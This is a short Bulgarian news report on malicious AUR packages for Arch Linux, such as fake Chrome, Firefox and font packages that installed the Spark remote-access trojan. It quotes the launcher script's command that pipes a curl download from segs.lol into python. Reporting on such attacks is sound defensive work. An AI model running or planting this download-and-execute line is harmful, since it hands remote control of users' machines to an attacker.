В хранилището AUR (Arch User Repository), използвано в Arch Linux за разпространение на пакети от трети разработчици, продължи публикуването на злонамерен код, интегриран в пакети с неофициални версии на браузъри. В допълнение към откритите преди две седмици злонамерени пакети firefox-patch-bin, librewolf-fix-bin и zen-browser-patched-bin, в AUR беше добавен пакет google-chrome-stable, който също съдържаше промяна, инсталираща злонамерен компонент, предоставящ отдалечен достъп до системата.
В файла PKGBUILD проблемния пакет беше идентифицирана инсталация на скрипт за стартиране на браузъра google-chrome-stable.sh, в който наред с друго присъстваше команда ‘python -c «$(curl https://segs.lol/9wUb1Z)»‘, изтегляща злонамерен софтуер, разпознат от услугата VirusTotal като троян Spark, позволяващ отдалечено управление на системата, стартиране на процеси, предаване на файлове, инспектиране на трафик и изпращане на екранни снимки.
Злонамереният пакет google-chrome-stable беше изтеглен преди два дни и беше премахнат от администраторите на AUR няколко часа след появата си. Почти веднага след премахването на google-chrome-stable в AUR бяха качени два злонамерени пакета — «chrome» и «chrome-bin», съдържащи подобен сценарий за инсталиране на злонамерен софтуер на системата на потребителя.
След това бяха открити още три пакета със злонамерен код: ttf-mac-fonts-all, ttf-ms-fonts-all и gromit.
Източник: opennet.ru
